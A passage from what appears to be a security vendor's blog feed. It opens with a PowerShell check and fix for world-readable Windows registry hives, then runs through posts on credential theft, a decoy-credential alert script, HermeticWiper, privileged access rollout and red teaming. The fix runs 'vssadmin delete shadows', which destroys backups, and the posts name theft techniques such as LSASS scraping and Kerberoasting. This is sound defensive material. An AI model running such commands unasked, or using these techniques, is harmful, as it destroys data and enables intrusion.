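$hives = 'SAM', 'SYSTEM', 'SECURITY' | ForEach-Object { Join-Path $env:windir "System32\config\$_" }
$readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData

# Condition 1: BUILTIN\Users holds an Allow ACE that includes ReadData on a hive file.
# Get-Acl only needs READ_CONTROL, so it works even though the live hive is locked.
$readable = foreach ($hive in $hives) {
    $aces = (Get-Acl -Path $hive).Access | Where-Object {
        $_.IdentityReference -eq 'BUILTIN\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band $readData) -ne 0)
    }
    if ($aces) { $hive }
}

# Condition 2: a Volume Shadow Copy exists, so an unlocked copy of the hives is readable
# under \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... (enumeration needs admin).
$shadows = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue)

if ($readable -and $shadows.Count -gt 0) {
    Write-Warning ('VULNERABLE: {0} readable by Users and {1} shadow copy(ies) present' -f
                   ($readable -join ', '), $shadows.Count)
} elseif ($readable) {
    Write-Warning 'Hive ACLs are permissive; exploitable as soon as a shadow copy is created (e.g. a restore point).'
} else {
    Write-Output 'Hive ACLs do not grant BUILTIN\Users read access.'
}

if ($Fix) {
    # Microsoft's workaround: re-enable ACL inheritance on the config directory contents
    # (removing the explicit Users:RX entries), then delete existing shadow copies so no
    # readable copy of the old hives remains. Create a fresh restore point afterwards.
    icacls "$env:windir\system32\config\*.*" /inheritance:e
    vssadmin delete shadows /for=$env:SystemDrive /Quiet
}
```

The workaround is a stopgap that also discards existing restore points, so the August 2021 update should still be applied; the check itself is cheap enough to run from an endpoint agent or scheduled task as a compensating control until it is.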

For instance, attackers know that browser session cookies often stay valid for days or weeks and that most people never clear them. When those cookies are stolen from the browser's cookie store, they let an attacker replay an already-authenticated session, bypassing multi-factor authentication (MFA) and single sign-on (SSO) controls and gaining ready access to critical business applications such as Salesforce, Jira or Slack.

Threat actors continue to innovate with a variety of credential theft techniques in the wild, such as stealing cached domain credentials from the local machine and requesting Kerberos service tickets for service accounts in order to crack them offline (Kerberoasting). In trying to patch every identity-centric weakness individually, vulnerability management teams quickly find themselves back in a never-ending game of whack-a-mole.

How Holistic Endpoint Threat Protection Stops the Endless Patching Cycle

Whatever their end goal, attackers almost always start by compromising identities, then move laterally and vertically to escalate privileges in search of their target. In fact, identity compromise through credential theft is the most common initial attack vector today, according to the latest IBM Cost of a Data Breach report — costing organizations an average of $4.37 million per breach.

With this front of mind, many security teams are broadening their approach to credential theft protection. Instead of patching vulnerabilities one by one, they're addressing the root issue: blocking credential theft attempts at the endpoint from the start and limiting privileged access more intelligently through automation. This typically involves three key actions:

  1. Putting automated controls in place to detect and block theft attempts against browsers, the operating system and credential stores, whether by software abuse, memory scraping (for example, reading LSASS) or other attack techniques.
  2. Placing credential "lures" at points along common attack paths. These traps are designed to be relatively easy to find and harvest. Once an attacker tries to use a seemingly legitimate credential, it sets off alarms, prompting security teams to jump-start an investigation, detect threats faster and reduce dwell time.
  3. Layering least privilege enforcement and application control on top of vulnerability assessment and patching tools to detect and neutralize threats at the endpoint before attackers have a chance to cause significant damage.

Similar to virtual patching — where security policies are implemented to close vulnerability exploitation pathways in the interim to shield against exploits until a patch is available from the vendor — this approach helps security teams leverage credential theft protection to dramatically reduce risk exposure. If and when individual patches become available and they are feasible to apply, teams can roll out fixes in a more manageable cadence, focus their efforts on key areas of risk, and ultimately, make a greater impact.
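The lure in step 2 is only useful if something watches for it. The script below is an added example written for this article, not a CyberArk feature or code from the original post. It assumes hypothetical decoy accounts (svc_backup_decoy, adm_legacy_decoy) that were created in the domain in a disabled state and seeded on endpoints with cmdkey, so that tools which harvest Credential Manager pick them up; because a disabled account is never used legitimately, any authentication event that names it is an attacker, and the failed-logon status it produces still gets logged.

```powershell
# Added example: alert when a planted decoy credential is used anywhere.
# Illustrative code for this article, not a CyberArk feature.
# Seeding a lure on an endpoint (hypothetical host and account):
#   cmdkey /add:fileserver01.corp.example /user:CORP\svc_backup_decoy /pass:<random>
# Run this query on domain controllers (4768/4771) and on endpoints (4624/4625/4648).

$decoys = @('svc_backup_decoy', 'adm_legacy_decoy')   # hypothetical decoy account names
$since  = (Get-Date).AddHours(-24)

# 4624/4625 logon success/failure, 4648 explicit-credential use,
# 4768/4771 Kerberos TGT request / pre-auth failure: all carry TargetUserName.
$ids    = 4624, 4625, 4648, 4768, 4771
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = $ids; StartTime = $since } `
          -ErrorAction SilentlyContinue

$hits = foreach ($e in $events) {
    # Parse the EventData block by field name rather than relying on property order.
    $fields = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) {
        if ($d.Name) { $fields[$d.Name] = $d.'#text' }
    }
    if ($decoys -contains $fields['TargetUserName']) {
        [pscustomobject]@{
            Time        = $e.TimeCreated
            EventId     = $e.Id
            Account     = $fields['TargetUserName']
            SourceIp    = $fields['IpAddress']
            Workstation = $fields['WorkstationName']
            Computer    = $e.MachineName
        }
    }
}

if ($hits) {
    $hits | Sort-Object Time | Format-Table -AutoSize
    # Forward to the SIEM or open an incident here: a decoy hit is high-confidence.
} else {
    Write-Output 'No decoy credential use in the last 24 hours.'
}
```

Because the decoy never appears in legitimate traffic, the alert needs no tuning; the source IP and workstation fields tell you which endpoint the credential was lifted from, which is usually the first compromised host.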

The Case for Building Identity Security into Enterprise UX Design https://www.cyberark.com/blog/the-case-for-building-identity-security-into-enterprise-ux-design/ Tue, 08 Mar 2022 14:00:30 +0000 https://www.cyberark.com/?p=128243 The Case for Building Identity Security into Enterprise UX Design

People expect nothing short of exceptional from their personal tech experiences. Yet these lofty, consumer-driven standards haven’t really applied to work-issued technology until recently. Now with ample work-from-anywhere time under their belts, workers are demanding more of the enterprise applications they use to do their jobs. And if user-centric Identity and Access Management (IAM) protections aren’t integrated tightly into enterprise software design, overall product security and quality will likely suffer.

The Evaporating Expectation of Constraint Is Why Security UX Needs an Overhaul

We recently spoke with Brandon Traffanstedt, CyberArk senior director, field technology office, and Khizar Sultan, CyberArk senior director, IAM product strategy and solutions, about business end-users’ shift from what Traffanstedt calls “the expectation of constraint” — and what it means for enterprise software design.

“Maybe your work computer was slower than your devices at home. Maybe you had to change your password every month. But we were mostly okay with it — our brains were wired to accept that when we entered the office; we’d sit down and slow down,” he explains.

But then came the pandemic and the remote work scramble. “If end-users couldn’t get their work done in typical fashion, they improvised, which often meant subscribing to new SaaS applications or taking security shortcuts like reusing the same passwords,” explains Sultan.

After all, he notes, people were at home where they felt safe and accustomed to fast, convenient technology experiences — from streaming movies to gaming to shopping online. Soon, this mental disconnect between corporate constraint and uninhibited technology freedom began to evaporate, and workers began to expect more.

Want to Create a Better Security UX? Start with the End-User

Many enterprise software providers are wisely tracking this push for more flexibility, especially as it pertains to security design. At the same time, they’re rearchitecting security mechanisms to surround individual identities, recognizing it’s now the only practical way to protect system components and data from misuse or harm.

These technologists understand that if end-users can’t easily access or use their applications because of constant requests for re-authentication or blocked access to things they legitimately need, they’ll find ways around IAM protocols. Sultan points to downloading rogue applications or providing the second factor for multi-factor authentication (MFA) without question as common “knee-jerk responses” to access fatigue.

It comes down to “anticipating barriers and removing them,” says Traffanstedt. And that means putting yourself in the end-users’ shoes. Take developers, for example. “These modern power users are operationally minded by default and have to move quickly, so they can be very enterprising when it comes to security workarounds,” he says. They won’t accept constraints, such as proving their identity repeatedly to gain access to resources they need to use regularly.

Overcome Three Common UX Concerns Through Intelligent Security Design

That's where Identity Security comes in, say Traffanstedt and Sultan. Incorporating technologies that work to secure access — regardless of device or location and at just the right time — into application design can help meet these common user experience (UX) expectations:

1. Eliminate Friction from My Day

End-users need easy access to key applications, data and services. What they don’t need is to juggle more passwords. Bringing real-time attribute and behavior-based context into authentication processes such as MFA and single sign-on (SSO) can help eliminate unnecessary “check points” that slow end-users down — while helping their organizations decrease overall reliance on problematic passwords and credentials.

As Sultan explains it, “Artificial intelligence and machine learning enable a more open-world work approach by baselining end-user habits and activity and dynamically adjusting authentication measures based on risk.” For instance, if a worker typically accesses the same resources from the same IP address at roughly the same time each day, authentication requests can be automatically scaled back to the minimum. If a deviation is detected from this “normal” behavior, access can be restricted until a stronger round of authentication happens.

2. Keep Me in the Loop

While ease of use should be the goal, Traffanstedt is quick to point out that less friction does not equal less information. If an end-user is granted just-in-time privileged access to do a job, for example, they need to be informed that their privileged session activity is being recorded.

“People don’t want to jump through security hoops, but they do need transparency about systems in place and confirmation that they are working,” he says. This confirmation can be as simple as a pop-up that lets the user know, “‘Hey, we automatically took care of authentication for you. Isn’t that cool?’”

Judicious security control and more transparency also go a long way in strengthening an organization’s security culture in which end-users feel empowered, but they also understand that vigilance and security are now part of everyone’s job.

3. Show Me Your Support

In such a competitive job market, employees expect more than just fair compensation and meaningful work. They’re also looking for empathy — an employer that prioritizes well-being across multiple dimensions. In fact, 83% of employees say they would leave their organization for a more empathetic employer. And sometimes, it’s the more subtle aspects of workforce empathy that can make a big impact.

A key example: ensuring that technology serves as an enabler, not a barrier, for employees doing their jobs. Especially in a time when 78% of remote workers say technology issues related to connecting to corporate systems and resources are their biggest hurdle to doing their jobs effectively.

Corporate leaders who prioritize the improvement of employee experiences can gain a true ROI on empathy as it pertains to product innovation and employee engagement. And security leaders concur: 86% say end-user experience optimization is “important” or “very important.”

Embrace Identity Security to Elevate Experiences

Real-time intelligence and analytics make it possible to infuse user-centric Identity Security policies into enterprise product design. This not only empowers workers to perform at their full potential, but it also shows their employers care enough about their success to protect them from threats that could undermine their hard work.

The ability to simultaneously enhance customers’ security postures, strengthen employer-employee connections and exceed end-user expectations is a powerful competitive differentiator for technology providers. And that, agree Traffanstedt and Sultan, means a world of opportunity for the companies that can rise to the occasion and deliver on a brand promise that connects directly to exceptional, highly secure experiences.

What to Do with Your “Second Chance” at Identity Security Success https://www.cyberark.com/blog/what-to-do-with-your-second-chance-at-identity-security-success/ Thu, 03 Mar 2022 14:00:59 +0000 https://www.cyberark.com/?p=128162 What to Do with Your “Second Chance” at Identity Security Success

At the start of the pandemic, security decision makers were focused on making remote work feasible — fast. They revamped Identity and Access Management (IAM) strategies, cobbled together what they had and accomplished technical feats in tight timeframes. They worked around the clock, made some tough calls and cultivated unexpected new leadership skills along the way.

Today, these security leaders are turning those rapid response plans into permanent Zero Trust-centered cybersecurity programs. You could call this the “era of second chances,” as CyberArk Chief Strategy Officer and Head of Corporate Development Clarence Hinton recently described it during a fireside chat featuring a Forrester analyst. But the pressure is on to get it right.

The Era of Second Chances for Security Decision-Makers

“We’ve seen three megatrends — digital transformation, cloud migration and the shift left — in flight for some time,” said Hinton. “The pandemic had a dual effect of accelerating each of those trends, while introducing the work-from-anywhere dynamic.”

Now, two years into countless iterations of “the new normal,” there’s actually no such thing as “normal” at all: some workers are back in the office, others are on the road, some are at home and many others are taking it day by day. Meanwhile, technology keeps moving to the cloud to enable anywhere, anytime innovation and improve both customer and employee experiences. And across the now-borderless enterprise, the number of human and machine identities continues to climb.

“Each human user has a different level of access to different corporate systems. Machines — from RPA bots to API calls — each have their own entitlements, though they’re often overlooked or poorly controlled. And out of the gate, there can be thousands of entitlements to any given cloud platform,” said Hinton. He described this untenable situation as an “overall proliferation of privileges” and that “we’ve reached a point where ‘identity’ and ‘privilege’ have become almost synonymous.”

All the while, attackers keep innovating. “From big game hunters and organized cyber crime syndicates to nation state actors, it’s safe to say we’re in the most expansive cyber threat landscape ever seen,” Hinton said.

On the bright side, security leaders’ show-me-the-money cries are finally being answered as cybersecurity becomes a Board-level issue. Between the budgets they’ve earned and lessons they’ve learned, many teams now have an opportunity to modernize their IAM infrastructures with Identity Security technologies that enable greater agility and pave the way for Zero Trust.

Four Tips for Smarter Security Spending

There’s a sense of urgency — which is a good thing. But you must have a plan, cautioned Hinton. It may seem on the surface that achieving Zero Trust is a bit like boiling the ocean — instead, the challenge should be broken into achievable initiatives based on risk. So, the question becomes, “How do I sequence my security spending in the most effective way possible?”

Hinton shared perspectives on how the following steps can help drive more informed decision-making:

  • Conduct a maturity assessment. Even if you’ve done one before, do it again. It’s like getting a regular health physical: you’ll see what’s in great shape and pinpoint deficiencies to address before they become real problems.
  • Align with business priorities. Map security controls to key business priorities and see how well they line up. Perhaps your organization is planning to launch a new digital transformation initiative and your on-premises Privileged Access Management (PAM) system won’t scale to meet the needs of the program. Such gaps should be high on your priority list.
  • Identify high-risk areas. Determine where you can mitigate the most risk in the shortest amount of time. For instance, organizations will often prioritize protections for identities — and their related privileged credentials — that can be exploited to control an entire environment, such as domain admin and cloud admin accounts. For some organizations, this may first require a discovery exercise to uncover identity and privileged access-related weaknesses across hybrid, cloud and DevOps environments.
  • Examine your metrics. Take a hard look at the security metrics you have in place. Are they truly useful in demonstrating program maturity and overall value? And are you reporting these metrics effectively to stakeholders at various levels of the business? Incorporating these foundational elements into your reporting architecture can help optimize your existing program and find new opportunities for automation and standardization.

These steps can help you prioritize your efforts, but always keep the larger picture in mind. "There is no shortcut or easy button — you have to approach security holistically," Hinton said.

Passwordless: A Zero Trust Priority

For many security and IAM leaders, tackling the password problem is a top item on their lists. “You could argue that passwords are the weakest link,” Hinton said. They’re so often what attackers use to get in the door and what attackers go after once they’re inside to escalate privileges. Not to mention end users, who juggle 80+ passwords on average, are fatigued or fed up entirely with passwords.

“The concept of a passwordless environment has been around for some time, but until recently, it was mostly wishful thinking — the stuff of science fiction,” Hinton continued. “But now, device-based authentication, biometrics and even behavioral analytics are making passwordless more attainable.” Industry standards such as FIDO are also evolving alongside technology to help reduce the world’s reliance on passwords and make authentication simpler and stronger.

With identity at the forefront of security conversation, now is a good time for security leaders to put that passwordless pilot program into motion, encouraged Hinton. It will be a big shift, so start small. For instance, work first with your IT team, which is typically made up of highly privileged users, and then expand to a business unit that's willing to partner with you through some initial growing pains. It's a long-tail approach, but it's one that will ultimately benefit everyone.

A strong passwordless experience — one that authenticates each identity with a high degree of accuracy — is a foundational Zero Trust component. When combined with broad least privilege enforcement, context-aware access controls and continuous monitoring mechanisms, organizations have a structured way to secure each identity — human or machine — without slowing things down.

In looking for ways to maximize this “second chance” at IAM success, consider the business impact of your security spending decisions, Hinton encouraged. Enhanced productivity, user experiences and customer value are what define successful companies. And that’s what an identity-centric approach to security can do.

Mission: Cyber Resilience https://www.cyberark.com/blog/mission-cyber-resilience/ Fri, 25 Feb 2022 20:35:12 +0000 https://www.cyberark.com/?p=127601

With all eyes on Ukraine, CISOs and other security leaders are heeding the call of governments and intelligence agencies to “shield up.”

In recent weeks, nation-state threat actors have ramped up attacks from DDoS, destructive wiper malware and espionage to website defacement, influence operations and disinformation campaigns targeting Ukrainian infrastructure and civilians alike.

Nothing is certain in the uncharted cyber battle theater and, as NotPetya showed the world, such threats can quickly morph and escalate, creating waves far beyond their initial targets. In a February 25 SANS Institute webinar, SANS senior instructor and former DoD cyber expert Jake Williams noted that collateral damage from the devastating 2017 NotPetya attacks demonstrated the extent to which infrastructure around the world is connected through unfiltered B2B VPNs. As this interconnectedness remains largely the same today, any mass-spillover event will likely still be fueled by automated propagation, he cautioned.

As cyber defenders scrutinize their security strategies, infrastructures and regional suppliers for weaknesses, resilience is core to their mission.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is emphasizing security leaders' crucial role as defenders of national security, economic prosperity and public safety. In new guidance issued as part of its "Shields Up" awareness campaign, the agency urges corporate leaders to empower their CISOs with both the resources and the top-down support needed to bolster their organization's cybersecurity posture during this time.

We strongly encourage organizations to review best practices outlined by CISA, SANS and other leading cyber authorities to help improve cyber readiness and resilience, with a strong emphasis on the following:

  • Take steps to help ensure all available software updates have been made and current patches are fully installed.
  • Maximize existing investments in continuous monitoring and detection capabilities to identify anomalous behavior quickly, relying on AI and automation to scale coverage.
  • Closely examine your network of remote vendors to identify providers working in affected geographies. Enforce necessary precautions, such as network traffic monitoring and strong access controls.
  • Inventory your B2B VPNs, block high-risk protocols on them and be prepared to disconnect them, should it become necessary, per SANS guidance.
  • Revisit your contingency plans and test backup procedures.
  • Minimize potential attack impact by enforcing key identity-centric security practices, such as requiring multi-factor authentication (MFA) and monitoring privileged sessions.

With constant vigilance and an assume breach mindset, you can boost your cyber resilience and defend your organization with confidence.

We at CyberArk remain steadfast in our mission to help organizations secure their most valuable assets — no matter the current risk environment. This commitment extends to our own security practices and standards. To learn how we are continuously enhancing our cybersecurity posture, visit the CyberArk Trust Center.

HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far) https://www.cyberark.com/blog/hermeticwiper-what-we-know-about-new-malware-targeting-ukrainian-infrastructure-thus-far/ Thu, 24 Feb 2022 23:05:45 +0000 https://www.cyberark.com/?p=127578 HermeticWiper Malware Targets Ukraine

As geopolitical tensions continue to mount, reports are emerging of a new wiper malware targeting Ukrainian infrastructure, such as government departments. Symantec and ESET research first tweeted about the new strain, dubbed HermeticWiper, on February 23. The malware has since been observed in the neighboring countries of Latvia and Lithuania. This follows a string of distributed denial-of-service (DDoS) cyber attacks and other recent threats in the region.

CyberArk Labs is closely following this unfolding situation. The HermeticWiper infections observed thus far appear to follow a familiar path: initial foothold achieved by exploitation of external-facing servers and compromised identities leveraged to move laterally. And, as is so often the case, privileged access appears to play a critical role in these attacks.

Based on initial analysis, the team has identified some specific characteristics of the malware:

  • Attacks are highly targeted: So far, the HermeticWiper attacks have been highly targeted. Specifically, the distribution of the wiper does not seem to be leveraging supply chain vulnerabilities or other “super-spreader” techniques to scale the attacks. This means that infection will not quickly spill to other geographies. However, initial analysis of the wiper does not reveal scoping parameters such as keyboard language settings, clock time zone, external IPs, etc., meaning the malware — or variants of the malware — may eventually spread to other targets in other countries. 
  • Deployment requires privileged admin rights: The wiper leverages high privileges on the compromised host to make it unbootable by overwriting the boot records and boot configuration, erasing device configuration and deleting shadow copies (backups). Similar tactics were observed in the 2017 NotPetya attacks, which also initially targeted Ukrainian infrastructure.
  • Active Directory can be used as a launchpad: In one reported case, the wiper software deployed using Active Directory group policy, which means the threat actors had privileged access to Active Directory. This scenario is more commonly used in targeted, human-operated incidents, such as the 2021 Kaseya ransomware supply chain attack.
  • Identity compromise is critical: The wiper appears to be configured NOT to wipe domain controllers. Keeping the domain running lets the operators continue using valid credentials to authenticate to member servers and wipe those. This highlights the critical role of identity in these attacks. By stealing or abusing the identities and credentials of employees or authorized third parties, threat actors can access the target network and/or move laterally.

Because HermeticWiper requires the compromise of identities and the abuse of privileged credentials, risk mitigation efforts should focus on endpoint privileged access controls, such as the removal of local admin rights and credential theft protection. Highly privileged credentials, such as those for Active Directory and other Tier 0 assets, should be protected to help prevent lateral movement and network infection.

CyberArk Labs continues to seek new samples and variants of this malware and will share the results of additional testing and analysis as it becomes available.

How to Fast-Track Your PAM Deployment for Rapid Risk Reduction https://www.cyberark.com/blog/how-to-fast-track-your-pam-deployment-for-rapid-risk-reduction/ Wed, 23 Feb 2022 14:00:06 +0000 https://www.cyberark.com/?p=127555

Maybe your security team is facing an upcoming audit. Maybe you’ve failed one and need to address the audit findings. Or maybe you’re working to improve cyber readiness in the face of ransomware and other advanced attacks. No matter your reason for rolling out Identity Security solutions to secure human and machine identities across your organization, you need to move fast to address your most urgent Privileged Access Management (PAM) requirements in the shortest amount of time possible.

To get up and running quickly, selecting a SaaS-delivered Privileged Access Management solution is a no-brainer for protecting the attack path to your organization’s most valuable assets. But, as with any technology deployment, you still need a solid plan in place to streamline implementation and realize rapid time to value. Based on learnings from global customer deployments, our CyberArk Security Services team has identified repeatable, scalable practices to help organizations fast-track their Privileged Access Management deployments, reduce risk quickly and lay the foundation for a comprehensive Zero Trust security approach.

But before we dig in, here’s a refresher on why preventing the compromise of privileged credentials is so crucial to strengthening overall cybersecurity posture.

The Leading Role of Privileged Access in Identity-Based Attacks

With the adoption of modern infrastructure, cloud services and hybrid work models, privileged accounts and credentials are everywhere — from critical applications and IoT devices to robotic process automation (RPA) and DevOps tools. And while every organization’s IT environment is different, adversaries understand they can attack virtually any business by:

  1. Acquiring a valid set of credentials for an identity (human or machine) and using them to gain unauthorized access to sensitive data and systems.
  2. Moving laterally through the network/IT estate to uncover new levels of privileged access and find high-value assets.
  3. Using elevated privileges to steal confidential information or disrupt services.

Privileged Access Pathway for Identity Based Attacks

With elevated privileged access and permissions to sensitive data and resources, attackers can begin to exfiltrate customer information, financial data or intellectual property. Or they can threaten to shut down systems or leak sensitive data unless a ransom is received. Either way, the outcome is the same: expensive and painful remediation that consumes security teams’ cycles and resources — which were already stretched to the limit.

Proactively Protect Your Digital Business Fast

Based on recommendations from NIST and other leading authorities, along with learnings from work with organizations around the globe, here’s a framework for accelerated, high-impact Privileged Access Management deployments. Following these best practices can help you break the cyber attack chain and achieve rapid risk and audit mitigation.

Phase 1: Discovery and Planning

  • Know where you are. Use automation to quickly inventory sensitive or compliance-tagged assets within your environment and the privileged accounts used to support them. Define your critical assets — those that, if brought down or breached, could seriously impact your company’s ability to support its mission — and evaluate the strength of existing controls.
  • Define where you want to go. With a solid baseline of your environment, outline your goals (both long- and short-term) and key use cases. Hold architecture workshops to review enterprise integrations (i.e., directory, authentication and monitoring tools). These sessions should identify operational considerations like staffing dependencies, technical status of related projects and timelines for executing key use cases. In these sessions, map out the personnel and access control processes necessary for a smooth implementation — and clearly define metrics and success criteria.
  • Remove barriers by getting stakeholders on board. Implementing a Privileged Access Management program is as much about people as it is about the technology. Speed your deployment — and help ensure your program’s long-term success — by securing buy-in and support from executive leadership and establishing a change management strategy for staffing and end user adoption from the start.

Phase 2: Deployment 

  • Test first to save time later. As the saying goes, measure twice, cut once. For example, when organizations deploy the CyberArk Privileged Access Management SaaS solution, a lightweight server or virtual machine is deployed alongside the customer’s environment. This allows teams to walk through common workflows and use cases before integrating them into production.
  • Create repeatable workflows. When incorporating learnings from the discovery and testing phases, begin onboarding critical assets while documenting processes so they can be easily repeated as the program expands to new areas.
  • Focus on high-risk targets. Many organizations will conduct an intensive “sprint” to quickly mitigate their greatest areas of risk. This often starts by securing identities and associated privileged accounts that can be exploited to control an entire environment, such as domain admin and cloud admin accounts. From there, it’s wise to lock down accounts used to service your most widely used technology platforms. This is often followed by implementing OS-level least-privileged access controls across workstations, laptops, desktops and virtual desktop instances (VDIs) to help block endpoint attacks such as ransomware from progressing.

Phase 3: Expansion

  • Demonstrate successes to mature your program. Report time-to-value wins from the initial “sprint” to business leaders, relaying efforts in meaningful, relatable terms like reduced risk of downtime, revenue loss or regulatory penalties. Describe additional steps and investments required to further bolster security and unlock operational efficiencies.
  • Codify fundamental practices. As you extend Identity Security controls to strengthen your defenses, formalize and scale these recurring Privileged Access Management practices: account onboarding, testing onboarded accounts, eliminating excess privileges and permissions, and collecting end-user feedback to continuously improve processes.
  • Tackle advanced Identity Security use cases. Set finite goals for what comes next. This may include protecting and monitoring sessions for all identities accessing sensitive servers, applications or cloud consoles. Other key use cases include removing local admin rights on servers and workstations, eliminating excessive cloud permissions or securing application credentials and continuous integration/continuous delivery (CI/CD) pipelines. Continuously assess the effectiveness of your plan, adjusting as needed.

Whether stemming from audit findings, compliance needs or response to heightened risk of attack, protecting identities and their associated privileged credentials is a top priority for many organizations today. Fortunately, significant risk reduction does not have to take long. By following proven recommendations from the CyberArk Identity Security Blueprint across people, process and technology domains, your organization can fast-track your Privileged Access Management deployment to strengthen your defenses and build a long-term roadmap for achieving the highest levels of protection.

How Red Teams Challenge Thinking and Put Cyber Defenses to the Test https://www.cyberark.com/blog/how-red-teams-challenge-thinking-and-put-cyber-defenses-to-the-test/ Thu, 10 Feb 2022 14:00:20 +0000 https://www.cyberark.com/?p=127411

Have you ever read the popular children’s series Where’s Waldo? or looked at one of those 3D Magic Eye images that took the ’90s by storm? The basic premise for both is to spot a hidden person or object within a larger puzzle. But sometimes the harder you stare, the less you find. Then, someone peers over your shoulder and points out Waldo hiding behind a tree, and somehow that elusive “magic” image comes into focus. That’s what a cybersecurity Red Team can do: challenge your thinking by helping you see things you couldn’t see before.

Why We All Need a Second Opinion

As humans, we each process information and solve problems differently. Our knowledge and personal experiences influence the way we view the world and have a huge impact on the decisions we make. As a result, we form “cognitive biases,” or unconscious flaws in our thinking, as our brains try to simplify complex ideas and situations.

First introduced in 1972 by Israeli psychologists Amos Tversky and Daniel Kahneman, the concept of cognitive bias can take many forms. For instance, attentional bias is when we prioritize certain things while ignoring others. Like when you’ve fallen in love with an 1800s Colonial-style house for its charm and top-ranked school district but brush aside the aging electrical system and sagging roofline. And by “you,” we may mean “us,” but that’s another story for another day.

Another bias, functional fixedness, impedes our ability to think outside the box and find new ways to solve problems. It’s the idea that you’ve always used a paper clip to keep pages together and can’t contrive alternate uses for the object like fixing a zipper or opening a lock. And then there’s the optimism bias — aka the illusion of invulnerability — that tricks us into believing negative experiences “won’t happen to me.”

Our inherent cognitive biases are why we need others to provide a second set of eyes or play devil’s advocate to help us think critically about the flipside of an issue, expand our view of the world and, hopefully, avoid damaging missteps. Red Teams were created along these very ideas: to put assumptions and plans through the wringer to make teams more resilient.

Red Teaming and the Art of Alternative Analysis

Red Teaming is a concept first introduced by the military to help shed such cognitive biases and test strategies from an external point of view. In a simulated wargame, the Red Team acts as the adversary, using various techniques and tools to try to penetrate defenses.

The U.S. University of Foreign Military and Cultural Studies (UFMCS) defines Red Teaming as “a function executed by trained, educated and practiced team members that provides commanders an independent capability to fully explore alternatives in plans, operations, concepts, organizations and capabilities in the context of the operational environment and from the perspectives of our partners, adversaries and others.” Red Teaming is built on four principles: self-awareness and reflection; fostering cultural empathy; groupthink mitigation and decision support; and applied critical thinking.

Because cognitive bias affects us all, teams across public and private sectors can benefit from an outsider’s look at their processes. Fans of Aaron Sorkin’s The Newsroom will recall when an outside Red Team was assembled to poke holes in a high-stakes investigative news story and test the credibility of its source, unbeknownst to the journalists assigned to the project. Similarly, real-world law enforcement and legal teams use Red Team techniques to uncover weaknesses in their cases and improve trial advocacy. And as organizations face an endless barrage of cyber threats, many are conducting independent Red Team exercises to get inside the mind of an attacker and put their cybersecurity defenses to the test.

How Adversary Simulations Can Help You Find Flaws Before Cyber Attackers Do

Red Team adversary simulations provide a safe, controlled way for security operations teams to uncover vulnerabilities, test response capabilities and identify areas of improvement. Red Teamers use any means necessary to mimic a real-world attack without introducing risk to the business. Organizations often engage independent Red Teams who bring advanced skills, fresh perspectives and objectivity to the table — along with the element of surprise — which is hard to achieve with an in-house group.

The Red Team works closely with the organization to determine the goals of the program based on its unique concerns and requirements. The organization may choose to test against known threats — by following the MITRE ATT&CK framework to simulate indicators of compromise (IoCs) associated with a specific threat actor — or unknown threats — by developing custom tools designed to penetrate the environment, pivot within the network and exfiltrate data.

As the global ransomware epidemic continues to grow and wreak havoc, many corporations are engaging Red Teams to identify technology and process gaps to improve cyber readiness. For these exercises, Red Teams design and execute specialized defense analysis programs that aim to encrypt local system files and evade various security technologies the organization may have in place such as anti-virus, endpoint detection and response solutions, and special-purpose ransomware prevention tools. In response, the organization’s security team — the Blue Team — executes its incident response process to contain the infected host, prevent further execution and recover the affected files.

At the end of the exercise, organizations often receive a two-part takeaway. The first report is a 50,000-foot view of the organization’s security posture with key findings and risk-prioritized recommendations for the executive team. The second is a technical analysis that details information on the vulnerabilities uncovered and recommended remediation steps to reduce exposure for security teams. With deeper insights into their security strengths and weaknesses, organizations can bolster defenses and create a baseline from which future security improvements can be measured.

Winston Churchill once said, “Criticism may not be agreeable, but it is necessary. It fulfills the same function as pain in the human body. It calls attention to an unhealthy state of things.” Many cyber attacks begin as a twinge — so minor they often go unnoticed until things become injurious. By exploiting weaknesses in systems and processes, and in human nature itself, Red Teamers push cybersecurity teams to think differently and see things sooner, no matter how uncomfortable the process may be. Empowered, these teams have the prescient ability to anticipate future failures — and work to stop them before they ever happen.

Why User Session Visibility is Key for Secure Applications https://www.cyberark.com/blog/why-user-session-visibility-is-key-for-secure-applications/ Tue, 08 Feb 2022 14:00:42 +0000 https://www.cyberark.com/?p=127335

“What’s happening?”

In the movie Office Space, it was a question to dread whenever Initech Vice President Bill Lumbergh would lean over long-suffering employee Peter Gibbons’ cubicle wall with an unreasonable request. This, of course, set off a chain of events including job dissatisfaction, hypnotism to mitigate said job dissatisfaction … oh, and an ill-advised embezzlement attempt inspired by the plot of Superman III.

As a security practitioner who needs to secure applications used by your global workforce, you’re no stranger to the question of “What’s happening?”

However, in your context, there’s no comedy — only urgency, high stakes and in many cases, a lack of visibility into real-time events that could lead to a devastating breach, attack or even an insider threat. And chances are you’re hearing this question more frequently, partly due to the rapid adoption of cloud-based apps that — while crucial for empowering your workforce — also give everyday users access to sensitive resources.

Perhaps you used to focus your energy on the high-risk privileged users like IT admins. But now, virtually everyone across your workforce has privileged-level access to something.

So it’s becoming clear that, when it comes to Identity and Access Management (IAM), organizations need to look beyond the crucial point of authentication and add layers of visibility and security to the actions people take once they’re inside the applications.

Without that, a security team loses time, loses ground and likely loses sleep.

We know that burnout is a major problem in the cybersecurity industry, exacerbated by an incomplete view into threats, despite a constant barrage of alerts and data. In fact, 83% of cybersecurity professionals said they’re struggling to cope with security alert fatigue as they try to distinguish meaningful insights from false alarms.

If you’re feeling like this and you too are struggling to respond to fire drills regularly without the insight you need into what’s causing incidents, you should know you’re not alone on this one.

CyberArk recently surveyed 900 global security leaders and decision makers to learn how they are monitoring, auditing and securing end users’ activity within high-risk applications. These cloud-based tools, such as Salesforce and workforce collaboration applications, often contain sensitive data such as financial records, customer information and intellectual property. The survey participants shared insights on their limits and pain points, as well as their aspirations for how greater visibility into user sessions could help them.

It turns out there’s a major opportunity for improvement. Here’s a snapshot of what we learned.

Today, 63% of organizations give their typical end user access to between five and 10 (or more) applications that contain or enable access to resources that attackers would deem high value.

End user app access

